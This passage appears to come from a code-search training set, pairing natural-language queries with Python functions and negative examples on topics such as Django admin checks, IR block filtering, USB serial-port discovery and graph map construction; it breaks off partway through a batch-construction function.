"def _check_raw_id_fields_item(self, obj, field_name, label):\n\n try:\n field = obj.model._meta.get_field(field_name)\n except FieldDoesNotExist:\n return refer_to_missing_field(\n field=field_name, option=label, obj=obj, id=\"admin.E002\"\n )\n else:\n # Using attname is not supported.\n if field.name != field_name:\n return refer_to_missing_field(\n field=field_name,\n option=label,\n obj=obj,\n id=\"admin.E002\",\n )\n if not field.many_to_many and not isinstance(field, models.ForeignKey):\n return must_be(\n \"a foreign key or a many-to-many field\",\n option=label,\n obj=obj,\n id=\"admin.E003\",\n )\n else:\n return []",
"def _process_frame(self, frame, with_vars):\n nodes = self._get_statements_for_frame(frame)\n raw_frame, filename, lineno, func_name, _, _ = frame\n\n varmap = None\n if with_vars:\n varmap = {}\n\n xfrmr = _checkTransformer(raw_frame.f_locals, raw_frame.f_globals)\n xfrmd = xfrmr.visit(ast.Module(copy.deepcopy(nodes)))\n\n for n in itertools.chain(ast.walk(xfrmd), xfrmr.extras):\n if isinstance(n, _resolved):\n val = n.value\n if isinstance(val, ast.AST):\n continue\n if n.representation in ('True', 'False', 'None'):\n continue\n if callable(val) or id(val) in self._ignore_set:\n continue\n if n.representation not in varmap:\n varmap[n.representation] = render_user_value(val)\n\n return CheckFrame(\n filename,\n lineno,\n func_name,\n '; '.join(astunparse.unparse(n).strip() for n in nodes),\n varmap\n )",
"def _fieldReferenceRenderer(self, node, context=None, **kwds):\n # get the reference to render itself\n return node.sql(context=context, **kwds)",
"def compile_selector_filter(self, selector):\n def get_entity(field_id):\n \"Get field from entity tested by filter\"\n def get_entity_f(e, c):\n return e.get(field_id, None)\n return get_entity_f\n #\n def get_context(name, field_id):\n \"Get field from named value in current display context\"\n def get_context_f(e, c):\n if name in c and c[name]:\n return c[name].get(field_id, None)\n return None\n return get_context_f\n #\n def get_literal(value):\n \"Get literal value specified directly in selector string\"\n def get_literal_f(e, c):\n return value\n return get_literal_f\n #\n def get_val_f(selval):\n if selval['type'] == \"entity\":\n return get_entity(selval['field_id'])\n elif selval['type'] == \"context\":\n return get_context(selval['name'], selval['field_id'])\n elif selval['type'] == \"literal\":\n return get_literal(selval['value'])\n else:\n msg = \"Unrecognized value type from selector (%s)\"%selval['type']\n raise ValueError(msg)\n assert False, \"Unrecognized value type from selector\"\n #\n def match_eq(v1f, v2f):\n def match_eq_f(e, c):\n return v1f(e, c) == v2f(e, c)\n return match_eq_f\n #\n def match_in(v1f, v2f):\n def match_in_f(e, c):\n v1 = v1f(e, c)\n if not v1: return True\n v2 = v2f(e, c)\n if isinstance(v2, list):\n return v1 in v2\n return v1 == v2\n return match_in_f\n #\n def match_subtype(v1f, v2f):\n def match_subtype_f(e, c):\n return self._fieldcomp.subtype(v1f(e, c), v2f(e, c))\n return match_subtype_f\n #\n if selector in {None, \"\", \"ALL\"}:\n return None\n sel = self.parse_selector(selector)\n if not sel:\n msg = \"Unrecognized selector syntax (%s)\"%selector\n raise ValueError(msg)\n v1f = get_val_f(sel['val1'])\n v2f = get_val_f(sel['val2'])\n if sel['comp'] == \"==\":\n return match_eq(v1f, v2f)\n if sel['comp'] == \"in\":\n return match_in(v1f, v2f)\n if sel['comp'] == \"subtype\":\n return match_subtype(v1f, v2f)\n # Drop through: raise error\n msg = \"Unrecognized entity selector (%s)\"%selector\n raise ValueError(msg)",
"def field(f):\n yield f",
"def field_is_unique(self, entity, field_name):\n value = getattr(entity, field_name)\n found = yield self.find_by_field_value(field_name, value)\n returnValue(len(found) > 0)",
"def process_field_xref(self, pnode: pending_xref) -> None:\n pass",
"def CreateTagTemplateField(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details(\"Method not implemented!\")\n raise NotImplementedError(\"Method not implemented!\")",
"def _wrap_create(self, old_create, model):\n def wrapper(cr, uid, vals, context=None):\n # avoid loops or cascading actions\n if context and context.get('action'):\n return old_create(cr, uid, vals, context=context)\n\n context = dict(context or {}, action=True)\n new_id = old_create(cr, uid, vals, context=context)\n\n # as it is a new record, we do not consider the actions that have a prefilter\n action_dom = [('model', '=', model), ('trg_date_id', '=', False), ('filter_pre_id', '=', False)]\n action_ids = self.search(cr, uid, action_dom, context=context)\n\n # check postconditions, and execute actions on the records that satisfy them\n for action in self.browse(cr, uid, action_ids, context=context):\n if self._filter(cr, uid, action, action.filter_id, [new_id], context=context):\n self._process(cr, uid, action, [new_id], context=context)\n return new_id\n\n return wrapper"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Construct a map from simple optional locations to their inner location and traversed edge.
|
def extract_simple_optional_location_info(
        ir_blocks, complex_optional_roots, location_to_optional_roots):
    # Simple optional roots are a subset of location_to_optional_roots.values() (all optional roots)
    # We filter out the ones that are also present in complex_optional_roots.
    location_to_preceding_optional_root_iteritems = six.iteritems({
        location: optional_root_locations_stack[-1]
        for location, optional_root_locations_stack in six.iteritems(location_to_optional_roots)
    })
    simple_optional_root_to_inner_location = {
        optional_root_location: inner_location
        for inner_location, optional_root_location in location_to_preceding_optional_root_iteritems
        if optional_root_location not in complex_optional_roots
    }
    simple_optional_root_locations = set(simple_optional_root_to_inner_location.keys())

    # Blocks within folded scopes should not be taken into account in this function.
    _, non_folded_ir_blocks = extract_folds_from_ir_blocks(ir_blocks)

    simple_optional_root_info = {}
    preceding_location = None
    for current_block in non_folded_ir_blocks:
        if isinstance(current_block, MarkLocation):
            preceding_location = current_block.location
        elif isinstance(current_block, Traverse) and current_block.optional:
            if preceding_location in simple_optional_root_locations:
                # The current optional Traverse is "simple"
                # i.e. it does not contain any Traverses within.
                inner_location = simple_optional_root_to_inner_location[preceding_location]
                inner_location_name, _ = inner_location.get_location_name()
                simple_optional_info_dict = {
                    'inner_location_name': inner_location_name,
                    'edge_field': current_block.get_field_name(),
                }
                simple_optional_root_info[preceding_location] = simple_optional_info_dict

    return simple_optional_root_info
|
[
"def _build_default_map(self):\n\n return [[\"-\" for x in range(self.map_size[0])] \n for y in range(self.map_size[1])]",
"def _iso_inv_map(d):\n _d = {}\n for src, d2 in d.items():\n for tgt, data in d2.items():\n if tgt is not None and src != tgt:\n if tgt not in _d:\n _d[tgt] = {}\n _d[tgt][src] = '--' + data\n for k, d2 in _d.items():\n d[k].update(d2)",
"def test_can_create_from_complex_dict(self):\n original_map = {}\n original_map['control'] = ['pid', 'odometry']\n original_map['foo'] = ['bar']\n\n locations = create_dependency_location_map(original_map)\n\n self.assertEqual(\"control\", locations[\"pid\"])\n self.assertEqual(\"control\", locations[\"odometry\"])\n self.assertEqual(\"foo\", locations[\"bar\"])",
"def map_roads():\n\n dict_map = defaultdict(default_factory,{\n \"disused\" : \"other\",\n \"dummy\" : \"other\",\n \"planned\" : \"other\",\n \"platform\" : \"other\",\n \"unsurfaced\" : \"track\",\n \"traffic_island\" : \"other\",\n \"razed\" : \"other\",\n \"abandoned\" : \"other\",\n \"services\" : \"track\",\n \"proposed\" : \"other\",\n \"corridor\" : \"track\",\n \"bus_guideway\" : \"other\",\n \"bus_stop\" : \"other\",\n \"rest_area\" : \"other\",\n \"yes\" : \"other\",\n \"trail\" : \"other\",\n \"escape\" : \"track\",\n \"raceway\" : \"other\",\n \"emergency_access_point\" : \"track\",\n \"emergency_bay\" : \"track\",\n \"construction\" : \"track\",\n \"bridleway\" : \"track\",\n \"cycleway\" : \"other\",\n \"footway\" : \"other\",\n \"living_street\" : \"tertiary\",\n \"path\" : \"track\",\n \"pedestrian\" : \"other\",\n \"primary\" : \"primary\",\n \"primary_link\" : \"primary\",\n \"residential\" : \"tertiary\",\n \"road\" : \"secondary\",\n \"secondary\" : \"secondary\",\n \"secondary_link\" : \"secondary\",\n \"service\" : \"tertiary\",\n \"steps\" : \"other\",\n \"tertiary\" : \"tertiary\",\n \"tertiary_link\" : \"tertiary\",\n \"track\" : \"track\",\n \"unclassified\" : \"tertiary\",\n \"trunk\" : \"primary\",\n \"motorway\" : \"primary\",\n \"trunk_link\" : \"primary\",\n \"motorway_link\" : \"primary\"\n })\n \n return dict_map",
"def _get_undirected_edges(self, mapping):\n edges = {}\n for et in utils.rels_types:\n edges[et] = {}\n for g in self.G.nodes:\n edges[et][mapping[g]] = []\n for s, t, meta in self.G.edges(data=True):\n edges[meta['type']][mapping[s]].append(mapping[t])\n edges[meta['type']][mapping[t]].append(mapping[s])\n return edges",
"def test_populate_map(self):\n map1 = \"\"\"\\\n OOOOOO\n OJDJJO\n OSJJOO\n OOOOOO\"\"\"\n m = Ma.Map(map1)\n pos = (1, 1)\n pop = [Fa.Carnivore(), Fa.Herbivore(), Fa.Carnivore()]\n m.populate_map(pos, pop)\n assert m.island[1, 1].total_pop == 3\n assert m.island[1, 1].carnivore_pop == 2",
"def map_railway():\n\n dict_map = defaultdict(default_factory,{\n \"rail\" : \"primary_rail\",\n \"station\" : \"station\",\n \"platform_edge\":\"platform\", \n \"platform\" : \"platform\",\n \"abandoned\" : \"disused\",\n \"razed\": \"disused\", \n \"construction\" : \"construction\",\n \"disused\" : \"disused\" ,\n \"funicular\" : \"other\" ,\n \"light_rail\" : \"light_rail\",\n \"miniature\" : \"other\",\n \"narrow_gauge\" : \"other\",\n \"preserverd\" : \"other\",\n \"subway\" : \"subway\",\n \"tram\" : \"tram\"\n \n })\n\n return dict_map",
"def get_shortest_path_map(g: Graph,\n start: Any, end: Any, points: list) -> dict[Any, dict[Any, Path]]:\n\n shortest_map = {start: {},\n end: {}}\n for point in points:\n shortest_map[point] = {}\n\n for point in points:\n for other in points:\n if other != point:\n shortest_path = _dijkstra(g, point, other)\n reverse = shortest_path.get_reversed()\n\n shortest_map[point][other] = shortest_path\n shortest_map[other][point] = reverse\n\n from_start = _dijkstra(g, start, point)\n shortest_map[start][point] = from_start\n\n to_end = _dijkstra(g, point, end)\n shortest_map[point][end] = to_end\n\n return shortest_map",
"def get_shortest_map_and_graph(g: Graph, start: Any, end: Any, points: list) ->\\\n tuple[dict[Any, dict[Any, Path]], Graph]:\n\n shortest_map = get_shortest_path_map(g, start, end, points)\n shortest_graph = convert_shortest_map_to_graph(shortest_map)\n\n return shortest_map, shortest_graph",
"def is_mapedge(mymap, x, y):\n if mymap[x][y].mapedge:\n return True\n else:\n return False",
"def _get_distances_map(self, distances):\n distances_map = {}\n for a, b, d in distances:\n distances_map[(a, b)] = d\n distances_map[(b, a)] = d\n distances_map[(a, a)] = 0.0\n distances_map[(b, b)] = 0.0\n return distances_map",
"def _derived_edges_mapping(self):\n mapping = {}\n purposes = ['METAL', 'DEVICE_METAL', 'CIRCUIT_METAL']\n for pl in RDD.get_physical_layers_by_purpose(purposes=purposes):\n key = pl.process.symbol\n if hasattr(RDD.PLAYER[key], 'EDGE_CONNECTED'):\n derived_layer = RDD.PLAYER[key].EDGE_CONNECTED\n ps_1 = derived_layer.layer1.process.symbol\n ps_2 = derived_layer.layer2.process.symbol\n if ps_1 == ps_2:\n mapping[derived_layer] = RDD.PLAYER[key].OUTSIDE_EDGE_DISABLED\n else:\n es = \"Error in RDD: Edge process \\'{}\\' not the same as metal process \\'{}\\'.\"\n raise ValueError(es.format(ps_2, ps_1))\n else:\n LOG.warning('Edge detection for METAL layer {} ignored.'.format(key))\n return mapping",
"def create_edge_dict(edgelist):\n edgedict = {}\n for (p, q, w) in edgelist:\n edgedict[(p, q)] = w\n return edgedict",
"def create_custom_mapping(custom_map: dict = None) -> Callable[[dict], dict]:\n if custom_map is None:\n custom_map = {}\n\n custom_tree = {}\n\n if isinstance(custom_map, dict):\n for key, value in custom_map.items():\n subtree = custom_tree\n for char in key:\n if not subtree.get(char):\n subtree[char] = {}\n subtree = subtree[char]\n subtree[\"\"] = value\n\n def make_map(map: dict):\n map_copy = map.copy()\n\n def transform_map(map_subtree, custom_subtree):\n if (not map_subtree) or isinstance(map_subtree, str):\n return custom_subtree\n new_subtree = map_subtree\n for char, subtree in custom_subtree.items():\n new_subtree[char] = transform_map(map_subtree.get(char), subtree)\n return new_subtree\n\n return transform_map(map_copy, custom_tree)\n\n return make_map",
"def _build_colormap(c_map, f_map):\n\n return {k: v for k, v in c_map + f_map if v is not None}",
"def EdgePropertySet(edge=None):\n if edge is None:\n return {PROV2NEO_EDGE}\n label = (PROV2NEO_LABEL, edge_label(edge))\n properties = [*edge.attributes[2:], *edge.extra_attributes]\n return {PROV2NEO_EDGE, label, *properties}",
"def buildMap(self, bingo):\n numToCoordsMap = {}\n dim = len(bingo)\n for x in range(dim):\n for y in range(dim):\n numToCoordsMap[bingo[x][y]] = (x,y)\n return numToCoordsMap",
"def create_neighborhood_dict(edgelist):\n ndict = {}\n for ed in edgelist:\n p, q, _ = ed\n if p not in ndict:\n ndict[p] = set()\n if q not in ndict:\n ndict[q] = set()\n ndict[p].add(q)\n ndict[q].add(p)\n return ndict",
"def zeros(geometry):\n\ttiles = [enmap.zeros(ts,tw,dtype=geometry.dtype) for ts,tw in geometry.loc_geometry]\n\treturn Dmap(geometry, tiles, copy=False)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Return a list of IR blocks as a copy of the original, with EndOptional blocks removed.
|
def remove_end_optionals(ir_blocks):
new_ir_blocks = []
for block in ir_blocks:
if not isinstance(block, EndOptional):
new_ir_blocks.append(block)
return new_ir_blocks
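
A minimal usage sketch follows; the EndOptional and Traverse classes below are stand-ins defined here only so the example is self-contained, not the compiler's real IR block types.

class EndOptional:  # hypothetical stand-in for the real EndOptional IR block
    pass

class Traverse:  # hypothetical placeholder for any other kind of IR block
    pass

ir_blocks = [Traverse(), EndOptional(), Traverse()]
filtered = remove_end_optionals(ir_blocks)
print(len(filtered))  # 2 -- the EndOptional block has been dropped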
|
[
"def get_block_chain(self) -> List[Block]:\n return [Block(h, t) for h, t in self.chain.items()]",
"def copy(self):\n new_list = CircularPositionalList()\n for e in self:\n new_list.add_last(e)\n return new_list",
"def copy(self) -> \"SbProjector *\":\n return _coin.SbLineProjector_copy(self)",
"def hollow_copy(self):\n new_tirp = TIRP()\n new_tirp._symbols = copy(self._symbols)\n new_tirp._label=self._label\n new_tirp._name = self._name\n new_tirp._tirp_matrix = self._tirp_matrix.copy()\n\n return new_tirp",
"def copy(self, in_place: bool = False) -> list:\n new_ingredients = self.copy_ingredients()\n if in_place:\n self.ingredient_list = new_ingredients\n else:\n new_list = GroceryList(self.copy_ingredients())\n return new_list",
"def copy(self):\r\n return CellList([cell.copy() for cell in self])",
"def copy(self, parent):\n out = Block(self.type)\n out.pins = dict((k, v.copy(out)) for k, v in self.pins.items())\n out.mirrored = self.mirrored\n out.rotation = self.rotation\n\n out.name = self.name\n out.groups = self.groups\n\n out.size = self.size\n out.field = parent or self\n\n return out",
"def rewind(self,index):\n removed_instructions = []\n for instruction in reversed(self.protocol.instructions[index:]):\n for group in reversed(instruction[\"groups\"]):\n for transfer in group.get(\"transfer\",{}):\n fromLoc = transfer[\"from\"][\"locName\"]\n toLoc = transfer[\"to\"][\"locName\"]\n volume = transfer[\"volume\"]\n self.rev_transfer(fromLoc,toLoc,volume)\n removed_instructions.insert(0,self.protocol.instructions.pop())\n return removed_instructions",
"def iter_blocks(self):\n blocks = re.split(r'\\n{2,}', self.args.input.read())\n return (b for b in blocks if b)",
"def copy(self):\n\n cards = [None]*len(self)\n for i in range(len(self)):\n cards[i]=Card('').fromstring(str(self[i]))\n return CardList(cards)",
"def clone(orig: Model[InT, OutT], n: int) -> Model[InT, OutT]:\n if n == 0:\n return cast(Model[InT, OutT], noop())\n elif n == 1:\n return orig\n layers: List[Model] = [orig]\n for i in range(n - 1):\n layers.append(orig.copy())\n return cast(Model[InT, OutT], chain(*layers))",
"def condense_output_list(output_list, options):\r\n out_list = [['textBlock', ''], ]\r\n for blocks in output_list:\r\n for block in blocks:\r\n if block[0] == \"commentBlock\":\r\n block[0] = \"inputBlock\"\r\n if options.nocode and block[0] == \"inputBlock\":\r\n continue\r\n elif block[0] == out_list[-1][0]:\r\n out_list[-1][1] += block[1]\r\n if block[0] == 'outputBlock':\r\n out_list[-1][2] += block[2]\r\n out_list[-1][1] = re.sub(r\"(\\n)+\", r\"\\n\", out_list[-1][1])\r\n else:\r\n out_list += [block]\r\n return out_list",
"def state_copy(self):\n list1 = []\n list2 = []\n for x in self.state[0]:\n list1.append(x)\n for x in self.state[1]:\n list2.append(x)\n ret = []\n ret.append(list1)\n ret.append(list2)\n return ret",
"def copy(self):\n return _core.SwigPyIterator_copy(self)",
"def copy(self):\n\n rv = FileList()\n\n for i in self:\n rv.append(i.copy())\n\n return rv",
"def get_combinational_blocks( self ):\n return self._combinational_blocks",
"def copy_ingredients(self) -> list:\n new_ingredients = [Ingredient(ing) for ing in self.ingredient_list]\n return new_ingredients",
"def reviter(self):\n for b in self.blocks[::-1]:\n yield b",
"def optimize_blocks(self) -> Location:\n return self._combine_blocks(preserve_overlappers=True)._remove_empty_blocks()._to_single_interval_if_one_block()"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Print MYHOMECMD version, build and date
|
def print_version():
logger.debug("print_version")
    print("MYHOMECMD Version: " + __version__)
    print(__date__.replace('$', ''))
logger.debug("Exit 0")
sys.exit(0)
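
The function relies on module-level state that is not shown. A hedged sketch of the minimal surroundings it assumes; logger, __version__ and __date__ are placeholders here, not the real values from MYHOMECMD:

import logging
import sys

logger = logging.getLogger("myhomecmd")   # assumed module-level logger
__version__ = "0.0.0"                     # placeholder version string
__date__ = "$Date: 2024-01-01 $"          # placeholder RCS-style date keyword

print_version()   # prints the version and date, then exits with status 0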
|
[
"def version(self):\n# import subprocess\n# p = subprocess.Popen('ecl --version', shell=True, stdin=subprocess.PIPE,\n# stdout = subprocess.PIPE, stderr=subprocess.PIPE)\n# return AsciiArtString(p.stdout.read())\n return \"Version information is given by lisp.console().\"",
"def print_tohu_version():\n print(f\"Tohu version: {get_versions()['version']}\")",
"def print_version():\n try:\n print('Build date: %s (%#x)' % (build_date, hex_version()))\n print('LibVLC version: %s (%#x)' % (bytes_to_str(libvlc_get_version()), libvlc_hex_version()))\n print('LibVLC compiler: %s' % bytes_to_str(libvlc_get_compiler()))\n if plugin_path:\n print('Plugin path: %s' % plugin_path)\n except:\n print('Error: %s' % sys.exc_info()[1])",
"def version():\n click.echo(\"adafruit-nrfutil version {}\".format(nrfutil_version.NRFUTIL_VERSION))",
"def conky_build_date(self):\n self.writeCommand('conky_build_date')\n return self",
"def get_system_version_info() -> str:\n output_template = '{:<12} {}'\n line_separator = '-' * 60\n not_found_str = '[Not Found]'\n out_lines = []\n\n # System (Python, OS)\n out_lines += ['System Version Info', line_separator]\n out_lines += [\n output_template.format(name, version) for name, version in (\n ('OS', '%s' % platform.platform()),\n ('Python', '%d.%d.%d' % sys.version_info[0:3]),\n )\n ]\n\n # Third-Party Packages\n out_lines += ['', 'Package Version Info', line_separator]\n backend_modules = (\n 'appdirs',\n 'av',\n 'click',\n 'cv2',\n 'moviepy',\n 'numpy',\n 'tqdm',\n )\n for module_name in backend_modules:\n try:\n module = importlib.import_module(module_name)\n out_lines.append(output_template.format(module_name, module.__version__))\n except ModuleNotFoundError:\n out_lines.append(output_template.format(module_name, not_found_str))\n\n # External Tools\n out_lines += ['', 'Tool Version Info', line_separator]\n\n tool_version_info = (\n ('ffmpeg', get_ffmpeg_version()),\n ('mkvmerge', get_mkvmerge_version()),\n )\n\n for (tool_name, tool_version) in tool_version_info:\n out_lines.append(\n output_template.format(tool_name, tool_version if tool_version else not_found_str))\n\n return '\\n'.join(out_lines)",
"def show_version(gcdroot, userhome, options):\n if len(options.args) > 0:\n return show_error(\n \"Unexpected arguments for %s: (%s)\"%(options.command, \" \".join(options.args)), \n GCD_UNEXPECTEDARGS\n )\n status = GCD_SUCCESS\n print(GCD_VERSION)\n # with open(logfilename, \"r\") as logfile:\n # shutil.copyfileobj(logfile, sys.stdout)\n return status",
"def show_version():\n return _run_speedify_cmd([\"version\"])",
"def show_version():\n print('{name} version {ver}\\n'.format(name=PROGNAME, ver=VERSION))\n sys.exit(0)",
"def version(args):\n print(f\"Cli - Version : {Helpers.cli_version()}\")",
"def version():\n print(\"gcdt version %s\" % __version__)",
"def version(self, **kwds):\n # print the version number\n print(f\"{{{project.name}.meta.version}}\")\n # all done\n return 0",
"def do_version(self, _args) -> None:\n ret = self.remote_exec(\"print(uos.uname().release)\")\n version = ret.decode(\"utf-8\")\n print(f\"Micropython version {version}\")",
"def print_platform():\n \n string = (\"PYTHON VERSION: {} \\nPLATFORM: {} \\nPROCESSOR: {}\"\n + \"\\nVERSION: {} \\nMAC VERSION: {}\")\n print(string.format(sys.version, platform.platform(),\n platform.uname()[5], platform.version()[:60]\n + '\\n' + platform.version()[60:], platform.mac_ver()))",
"def version():\n print('Version {}'.format(ekscli.__version__))",
"def version():\n print(\"Code writen for Python3.6.4. Using: %s\"%platform.python_version())",
"def build_info(self):\n \n path='/build_info'\n res = self.client.call(path, 'GET', data='', token=self.manager.identity.token)\n self.logger.debug('Openstack build info: %s' % \\\n truncate(res))\n return res[0]",
"def get_current_pkg_version():\n current_major_minor = _find_in_file(os.path.join(here, PKG_NAME, '__init__.py'))\n last_jenkins_build_num = get_next_jenkins_build()\n\n full_version = f'{current_major_minor}.{last_jenkins_build_num}'\n\n return full_version",
"def version():\n print('Lizzy Client', VERSION)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
find_tty_usb('10c4', 'ea60') -> '/dev/ttyUSB0'
|
import os
from os.path import join


def find_tty_usb(idVendor, idProduct):
    # Find the idVendor and idProduct with `lsusb -v`.
    # Note: if searching for a lot of pairs, it would be much faster to search
    # for the entire lot at once instead of going over all the usb devices
# each time.
for dnbase in os.listdir('/sys/bus/usb/devices'):
dn = join('/sys/bus/usb/devices', dnbase)
if not os.path.exists(join(dn, 'idVendor')):
continue
idv = open(join(dn, 'idVendor')).read().strip()
if idv != idVendor:
continue
idp = open(join(dn, 'idProduct')).read().strip()
if idp != idProduct:
continue
for subdir in os.listdir(dn):
if subdir.startswith(dnbase+':'):
for subsubdir in os.listdir(join(dn, subdir)):
if subsubdir.startswith('ttyUSB'):
return join('/dev', subsubdir)
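
Illustrative usage only: 10c4:ea60 is the Silicon Labs CP210x USB-UART bridge, a common adapter; substitute the IDs reported by `lsusb` for your own device. The function falls through and returns None when nothing matches:

port = find_tty_usb('10c4', 'ea60')
if port is None:
    print('no matching USB-serial adapter found')
else:
    print('adapter is at ' + port)   # e.g. '/dev/ttyUSB0'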
|
[
"def connect():\n for (COMMS_CHANNEL, NAME, deviceId) in serial.tools.list_ports.comports():\n if re.match(r\"^\\s*USB VID:PID=0*2341:0*3e\\b\", deviceId, re.I):\n f = serial.Serial(COMMS_CHANNEL, 115200, timeout=60)\n return f\n raise RuntimeError(\"Could not locate arduino serial port connection. Arduino not plugged in? Or plugged into wrong serial port on the arduino?\")",
"def find_usb_serial_devices():\n devicelist=[]\n\n if \"posix\" in os.name:\n # first, look for ttyUSB devices, and filter those supported\n devices=sorted(glob.glob(\"/dev/ttyUSB*\"));\n for device in devices:\n devicelist.append((device,__identify_usb_serial_device(device)))\n # next, look for ttyACM devices, and accept unfiltered (mbed)\n devices=sorted(glob.glob(\"/dev/ttyACM*\"));\n for device in devices:\n devicelist.append((device,\"ttyacm\"))\n return devicelist",
"def connect_pump():\n x = serial.Serial(\"/dev/ttyUSB0\", baudrate=9600,\n bytesize=serial.EIGHTBITS,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n timeout=1)\n if x.isOpen():\n print \"Connected to Pump \\n\"\n return x",
"def __init__(self, device_id, serial_port = \"/dev/ttyAMA0\"): \n self.device_id = device_id\n self.serial_port = serial_port\n self.ser = serial.Serial(self.serial_port)",
"def connectToSerial(dev):\n\tinsteon.setPort(IOPort(SerialIOStream(dev)))",
"def get_port():\n port = 0\n if sys.platform.startswith('darwin'):\n port = glob.glob('/dev/tty.usbmodem*')[0]\n elif sys.platform.startswith('win'):\n ports = ['COM%s' % (i + 1) for i in range(32)]\n for p in ports:\n try:\n s = serial.Serial(p)\n s.close()\n port = p\n except (OSError, serial.SerialException):\n pass\n return port",
"def get_virtio_disk_serial(device_name):\n dev_path = ('/sys/block/%s/serial' % device_name)\n out, err, rc = run_command([CAT, dev_path], throw=False)\n if (rc != 0):\n return ''\n # our out list has one element that is the serial number, like\n # ['11111111111111111111']\n return out[0]",
"def connect_uc(serport):\n\n ser = None\n try:\n ser = serial.Serial(serport, baudrate=115200, timeout=1)\n except Exception as msg:\n logging.critical(msg)\n exit(255)\n sleep(1)\n ser.flushInput()\n logging.info(\"connecting to uc over serial... \")\n i = randint(1,10000)\n try:\n ser.write('e {}\\n'.format(i))\n if int(ser.readline().split()[1]) == i:\n logging.info(\"connected to uc over serial.\")\n else:\n logging.critical(\"got unexpected response, can't start.\")\n exit(1)\n except IndexError:\n logging.critical(\"failed to connect, can't start.\")\n exit(1)\n return ser",
"def discover_arduinos():\n serial_ids = Popen(['ls', '/dev/serial/by-id'], stdout=PIPE, stderr=PIPE)\n\n paths = []\n\n if serial_ids.returncode:\n return paths\n\n for id in serial_ids.stdout:\n id = id.decode('utf8').strip()\n\n if re.search(r\"Arduino\", id):\n sym_link = Popen(['file', '/dev/serial/by-id/' + id], stdout=PIPE)\n\n for link in sym_link.stdout:\n out = re.search(r\"tty.*\", link.decode('utf8'))\n if out:\n paths.append(out.group(0))\n\n return paths",
"def open(address, timeout=5):\n return serial.Serial(address, baudrate=9600, timeout=timeout)",
"def serial_tx(string):\r\n Serial2.println(string)",
"def configure_com(port=None):\n try:\n print_serial_ports()\n if not port: i = input(\"## Port: \")\n else: i = port\n s = serial.Serial(i, 115200, timeout=SERIAL_TIMEOUT)\n print(\"Connection estabilished.\")\n except Exception as e:\n print(\"ERR! An error occured:\", e)\n return serial.Serial()\n\n signal = \"wait\"\n if not wait_for_signal(s, signal):\n print(\"ERR! Signal\", signal, \"not sent.\")\n return serial.Serial()\n return s",
"def get_com_port():\n ports = list(serial.tools.list_ports.comports())\n\n #Is list ports empty?\n if not ports:\n logging.critical(\"No Serial Ports found! Exiting now\")\n exit()\n\n #If there is only one port available, automatically use that one\n if len(ports) == 1:\n return ports[0].device\n\n #Display all available ports if there are more than one available\n print(\"Available Ports: \")\n for port in ports:\n print(port)\n return input(\"Enter Xbee Serialport: \")",
"def find_devices():\n dev_list = []\n for port in list_ports.comports():\n p = Serial()\n p.port = port.device\n p.timeout = 1\n try:\n p.open()\n except SerialException as e:\n icse0xxa_eprint(\"find_devices(): {}\".format(e))\n continue\n try:\n time.sleep(0.5)\n p.write(ICSE0XXADevice.ID_COMMAND)\n time.sleep(0.5)\n answer = p.read(1)\n if (len(answer) > 0) and (answer[0] in ICSE0XXADevice.MODELS):\n dev_list.append(ICSE0XXADevice(p.port, answer[0]))\n except SerialTimeoutException as e:\n icse0xxa_eprint(\"find_devices(): {}\".format(e))\n finally:\n p.close()\n return dev_list",
"def test_com_port(port=[]):\n # print(\"Testing\", port)\n s = serial.Serial(port, 115200, timeout=2)\n s.write(bytes([1]))\n s.write(bytes([13]))\n #n = 0\n #while n == 0:\n #n = s.inWaiting()\n try:\n m = ord(s.read())\n if m == 186:\n s.close()\n return 1\n if m == 174:\n s.close()\n return 2\n s.close()\n return 0\n except:\n return 0",
"def scan():\n if is_windows:\n # scan for available ports. return a list of tuples (num, name)\n available = []\n for i in range(256):\n try:\n s = serial.Serial(i)\n available.append( (i, s.portstr))\n s.close()\n except serial.SerialException:\n pass\n return available\n else:\n return glob.glob('/dev/ttyS*') + glob.glob('/dev/ttyUSB*')",
"def _find(self):\n ports = [port\n for port\n in serial.tools.list_ports.comports()\n if port.device != '/dev/ttyAMA0']\n\n for port in ports:\n try:\n conn = serial.Serial(\n port.device,\n self._baud,\n timeout=DETECT_TIMEOUT\n )\n if Serial._knock(conn):\n conn.close()\n return conn.port\n except:\n continue",
"def get_port(args, default_filename=\"conf/uart_path.txt\"):\n if args.COM != None:\n port = \"COM\" + str(args.COM)\n elif args.ttyUSB != None:\n port = \"/dev/ttyUSB\" + str(args.ttyUSB)\n elif args.ttyS != None:\n port = \"/dev/ttyS\" + str(args.ttyS)\n else:\n port = read_dev_path(default_filename)\n\n return port",
"def find_address(device = None, timeout = 0.1):\n rm = visa.ResourceManager()\n resources = rm.list_resources()\n for name in resources:\n \n if name.find('ASRL') > -1:\n read_termination = '\\r'\n else:\n read_termination = None #use default for GPIB\n try:\n instr = rm.open_resource(name, timeout = 1000*timeout, read_termination = read_termination)#it can fail to open if port already opend)\n out = instr.ask('*IDN?').strip('*IDN?')#sometimes commands are echoed back.. remove this echo\n ok = True\n except:\n out = ''\n ok = False\n if out != '' and ok:\n if device is not None:\n if out.find(device) != -1:\n instr.close()\n return name\n else:\n for dev in DEVICES:\n if out.find(dev) != -1:\n instr.close()\n return name\n if ok:\n instr.close()\n return ''"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Construct a batch from a list of trajectories and their information.
|
def construct_batch(
self,
trajs: List[Dict[str, List[Tuple[Graph, GraphAction]]]],
cond_info: float,
rewards: float,
) -> gd.Batch:
torch_graphs = [
self.ctx.graph_to_data(i[0]) for tj in trajs for i in tj["traj"]
]
actions = [
self.ctx.graph_action_to_aidx(g, a)
for g, a in zip(torch_graphs, [i[1] for tj in trajs for i in tj["traj"]])
]
num_backward = torch.tensor(
[
# Count the number of backward transitions from s_{t+1},
# unless t+1 = T is the last time step
self.env.count_backward_transitions(tj["traj"][i + 1][0])
if i + 1 < len(tj["traj"])
else 1
for tj in trajs
for i in range(len(tj["traj"]))
]
